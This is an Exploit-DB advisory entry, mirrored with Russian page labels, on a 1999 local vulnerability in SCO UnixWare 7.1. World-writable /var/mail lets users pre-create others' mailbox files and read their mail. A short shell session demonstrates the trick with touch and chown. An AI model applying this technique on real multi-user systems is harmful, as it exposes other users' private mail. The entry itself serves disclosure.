- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19657
- Проверка EDB
-
- Пройдено
- Автор
- BROCK TELLIER
- Тип уязвимости
- LOCAL
- Платформа
- SCO
- CVE
- cve-1999-0825
- Дата публикации
- 1999-12-03
SCO Unixware 7.1 - '/var/mail' Permissions
Код:
source: https://www.securityfocus.com/bid/849/info
Certain versions of SCO's UnixWare (only 7.1 was tested) ship with the /var/mail/
directory with permission 777(-rwxrwxrwx) . This in effect allows malicious users to read incoming mail for users who do not yet have a mail file (/var/mail/username) present. This may be done by simply creating the file in question with a permission mode which is readable to the attacker.
bash-2.02$ id
uid=106(xnec) gid=1(other)
bash-2.02$ pwd
/var/mail
bash-2.02$ touch btellier
bash-2.02$ chown btellier btellier
bash-2.02$ ls -la btellier
-rw-r--r-- 1 btellier other 0 Dec 4 07:54 btellier
Now wait for btellier to get some mail...- Источник
- www.exploit-db.com
